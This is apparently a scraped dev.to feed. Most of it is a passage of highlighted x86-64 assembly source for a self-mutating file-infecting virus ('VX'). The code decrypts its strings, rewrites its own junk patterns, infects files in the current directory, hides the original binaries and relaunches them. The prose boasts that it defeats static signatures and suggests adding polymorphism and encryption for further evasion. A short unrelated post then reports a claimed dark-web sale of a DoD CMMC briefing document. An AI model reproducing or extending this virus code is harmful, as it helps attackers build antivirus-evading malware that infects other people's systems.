<span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.cp_loop</span> <span class="nl">.handle_format:</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r9</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="s">'s'</span> <span class="nf">je</span> <span class="nv">.cp_string</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="s">'%'</span> <span class="nf">je</span> <span class="nv">.cp_percent</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="s">'%'</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.cp_loop</span> <span class="nl">.cp_percent:</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="s">'%'</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.cp_loop</span> <span class="nl">.cp_string:</span> <span class="nf">cmp</span> <span class="nv">r12</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">je</span> <span class="nv">.use_arg1</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">r11</span> <span class="c1">; second arg</span> <span class="nf">jmp</span> <span class="nv">.do_cp</span> <span class="nl">.use_arg1:</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">r10</span> <span class="c1">; first arg</span> <span class="nl">.do_cp:</span> <span class="nf">inc</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r9</span> <span class="nf">push</span> <span class="nb">rdx</span> <span class="nf">mov</span> <span class="nv">r9</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nl">.str_cp:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">r9</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">je</span> <span class="nv">.str_done</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">inc</span> <span class="nv">r8</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.str_cp</span> <span class="nl">.str_done:</span> <span class="nf">pop</span> <span class="nb">rdx</span> <span class="nf">pop</span> <span class="nv">r9</span> <span class="nf">inc</span> <span class="nv">r9</span> <span class="nf">jmp</span> <span class="nv">.cp_loop</span> <span class="nl">.done:</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">r8</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">pop</span> <span class="nv">r11</span> <span class="nf">pop</span> <span class="nv">r10</span> <span class="nf">pop</span> <span class="nb">rbp</span> <span class="nf">ret</span> <span class="nl">system_call:</span> <span class="c1">; execute shell</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_fork</span> <span class="nf">syscall</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.child_process</span> <span class="nf">js</span> <span class="nv">.error</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">xor</span> <span class="nv">r10</span><span class="p">,</span> <span class="nv">r10</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_wait4</span> <span class="nf">syscall</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">ret</span> <span class="nl">.child_process:</span> <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">32</span> <span class="nf">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">],</span> <span class="nv">sh_arg0</span> <span class="nf">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="o">+</span><span class="mi">8</span><span class="p">],</span> <span class="nv">sh_arg1</span> <span class="nf">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="o">+</span><span class="mi">16</span><span class="p">],</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="o">+</span><span class="mi">24</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_execve</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">shell_path</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">syscall</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_exit</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">syscall</span> <span class="nl">.error:</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">ret</span> <span class="c1">;; entry point</span> <span class="nl">_start:</span> <span class="c1">; anti goes here</span> <span class="c1">;avant:</span> <span class="nf">call</span> <span class="nv">d_str</span> <span class="c1">; Decrypt all</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_getrandom</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">si</span><span class="nv">gnme</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="mi">4</span> <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">syscall</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">vierge_val</span><span class="p">]</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">vierge</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">push</span> <span class="nb">rsi</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">bin_name</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span> <span class="nf">call</span> <span class="nv">strcpy</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span> <span class="nf">call</span> <span class="nv">basename</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">orig_exec_name</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">call</span> <span class="nv">strcpy</span> <span class="nf">call</span> <span class="nv">execute</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">push</span> <span class="nb">rsi</span> <span class="c1">; Read our own code</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">]</span> <span class="nf">call</span> <span class="nv">read_code</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_mutation</span> <span class="c1">; Apply mutations</span> <span class="nf">call</span> <span class="nv">replace_junk</span> <span class="nl">.skip_mutation:</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">push</span> <span class="nb">rsi</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">current_dir</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">]</span> <span class="nf">call</span> <span class="nv">list</span> <span class="nf">cmp</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">vierge</span><span class="p">],</span> <span class="mi">1</span> <span class="nf">jne</span> <span class="nv">.exec_theone</span> <span class="nf">cmp</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">orig_exec_name</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">jne</span> <span class="nv">.orig_name_ok</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">bin_name</span> <span class="nf">call</span> <span class="nv">basename</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">orig_exec_name</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">call</span> <span class="nv">strcpy</span> <span class="nl">.orig_name_ok:</span> <span class="c1">; Build hidden name for the chosen one</span> <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">512</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">256</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">orig_exec_name</span> <span class="nf">call</span> <span class="nv">hidden_name</span> <span class="c1">; Create touch command</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="c1">; Use first half for command</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">touch_cmd_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">256</span> <span class="c1">; Point to hidden name</span> <span class="nf">call</span> <span class="nb">sp</span><span class="nv">rintf</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">call</span> <span class="nv">system_call</span> <span class="c1">; Create chmod command</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="c1">; Reuse first half for command</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">touch_chmod_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">256</span> <span class="c1">; Point to hidden name</span> <span class="nf">call</span> <span class="nb">sp</span><span class="nv">rintf</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">call</span> <span class="nv">system_call</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">512</span> <span class="nl">.exec_theone:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">bin_name</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">hidden_prefix</span> <span class="nf">call</span> <span class="nv">strstr</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jnz</span> <span class="nv">.killme</span> <span class="c1">; Build hidden name and execute it</span> <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">512</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">256</span> <span class="c1">; Use second half for hidden name</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">orig_exec_name</span> <span class="nf">call</span> <span class="nv">hidden_name</span> <span class="c1">; Create exec command</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="c1">; Use first half for command</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">exec_cmd_fmt</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">256</span> <span class="c1">; Point to hidden name</span> <span class="nf">call</span> <span class="nb">sp</span><span class="nv">rintf</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">call</span> <span class="nv">system_call</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">512</span> <span class="nl">.killme:</span> <span class="c1">; Clean up any leftovers</span> <span class="nf">call</span> <span class="nv">zero0ut</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">xor</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">SYS_exit</span> <span class="nf">syscall</span> <span class="nl">zero0ut:</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">code</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">65536</span> <span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">rep</span> <span class="nv">stosb</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">di</span><span class="nv">r_buf</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">4096</span> <span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">rep</span> <span class="nv">stosb</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">temp_buf</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">1024</span> <span class="nf">xor</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">rep</span> <span class="nv">stosb</span> <span class="nf">ret</span> <span class="nl">read_code:</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">code</span> <span class="nf">call</span> <span class="nv">read_f</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">js</span> <span class="nv">.error</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">ret</span> <span class="nl">.error:</span> <span class="nf">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">ret</span> <span class="nl">extract_v:</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r13</span> <span class="nf">push</span> <span class="nv">r14</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">bin_name</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">code</span> <span class="nf">call</span> <span class="nv">read_f</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">js</span> <span class="nv">.err_v</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">65536</span> <span class="nf">jle</span> <span class="nv">.size_ok</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">65536</span> <span class="nl">.size_ok:</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">jmp</span> <span class="nv">.ext_done</span> <span class="nl">.err_v:</span> <span class="nf">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nv">codelen</span><span class="p">],</span> <span class="mi">0</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nl">.ext_done:</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">ret</span> </code></pre> </div> <h3> This Is Only the Foundation </h3> <p>Its purpose is to demonstrate core mechanisms, not to claim coverage of a complete system. Metamorphic and polymorphic engines go far deeper than what is shown here. What we have now is a starting point — sufficient to prove the concept, but still far from full-spectrum capability.</p> <p>Currently, the mutation engine only processes its own defined junk patterns. It does not touch arbitrary instruction sequences. It also only supports basic register replacement so far. Features such as instruction reordering, control-flow rewriting, and logical substitution are absent.</p> <p>Mutation patterns are hard-coded. There is no adaptive behavior. Propagation logic is also kept simple.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnxrf1y5n8gc6pv5cohf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnxrf1y5n8gc6pv5cohf.png" alt=" " width="800" height="395"></a></p> <h3> vx-mutation-demo </h3> <p>Each generation becomes different at the byte level, yet does the same things. What changes is the <em>implementation</em>, not the <em>behavior</em>. This is exactly why it shatters static signatures.</p> <p>As the VX repeatedly reinfects, the code drifts further from its original form. The hidden backup mechanism helps it stay low-profile. The original file continues to run normally, allowing the VX to persist quietly.</p> <p>Of course, these capabilities come at a cost: CPU and memory consumption, and doubled storage usage due to backups.</p> <h3> — Possibilities — </h3> <p>If you want to push further, you will need a larger pattern library, smarter runtime self-analysis, clean syscall abstraction for cross-platform support, and deeper code analysis with control-flow and data-flow mapping.</p> <p>Combine it with polymorphism: encrypted payload + deformable code structure creates a layered system. Surface randomization, internal concealment, final behavior invariant. The adversary will find almost no stable anchor points.</p> <p>Metamorphic code proves that software can continuously evolve its own implementation while keeping its goals unchanged.</p> <p>I recommend running the code inside a debugger rather than executing it blindly. Set breakpoints and step down into the assembly layer to inspect exactly what is being generated. This is the best way to catch subtle anomalies.</p> <p>That’s all for now — see you next time.</p> <p><strong>Disclaimer</strong>:<br><br> This blog post is provided solely for educational and research purposes. All technical details and code examples are intended to help defenders understand attack techniques and improve security posture. Please do not use this information to access or interfere with systems you do not own or lack explicit permission to test. Unauthorized use may violate laws and ethical standards. The author assumes no responsibility for any misuse or damage resulting from the application of the concepts discussed.</p> malware algorithms cybersecurity security [Confidential] U.S. Department of Defense CMMC Cybersecurity Briefing Document Leaked on the Dark Web Excalibra Thu, 09 Apr 2026 13:47:43 +0000 https://dev.to/excalibra/confidential-us-department-of-defense-cmmc-cybersecurity-briefing-document-leaked-on-the-dark-549p https://dev.to/excalibra/confidential-us-department-of-defense-cmmc-cybersecurity-briefing-document-leaked-on-the-dark-549p <p><strong>[Confidential] U.S. Department of Defense CMMC Cybersecurity Briefing Document Leaked on the Dark Web</strong></p> <p>A threat actor has claimed to be selling a U.S. Department of Defense (DoD) <strong>CMMC</strong> cybersecurity briefing document. The document focuses on the core elements of the <strong>CMMC 2.0</strong> framework, including its implementation processes, compliance requirements, and supporting systems. It serves as a standardized cybersecurity compliance guidance document targeted at Defense Industrial Base (DIB) contractors.</p> <p>This file functions both as an <strong>“implementation guide”</strong> for CMMC 2.0 and as a <strong>“compliance checklist”</strong> for contractors. By clearly defining processes, standards, and boundaries of responsibility, it helps drive the Defense Industrial Base from “passive defense” toward “proactive risk management.”</p> <p><strong>Details of the leaked content are as follows:</strong></p> <p><strong>Partial leaked data samples</strong></p> <p>1.1. Sample data </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn4tju867ji2zzuewgahg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn4tju867ji2zzuewgahg.png" alt=" " width="800" height="449"></a></p> <p>1.2. Sample data </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc4j0om0g7c16h0kkjzso.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc4j0om0g7c16h0kkjzso.png" alt=" " width="800" height="454"></a></p> <p>1.3. Sample data </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F336ay5hqbzyfevh7guuj.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F336ay5hqbzyfevh7guuj.png" alt=" " width="800" height="432"></a></p> <p>1.4. Sample data</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnuu6wbg5d808ldh130gq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnuu6wbg5d808ldh130gq.png" alt=" " width="800" height="446"></a></p> leaked cybersecurity documentation darkweb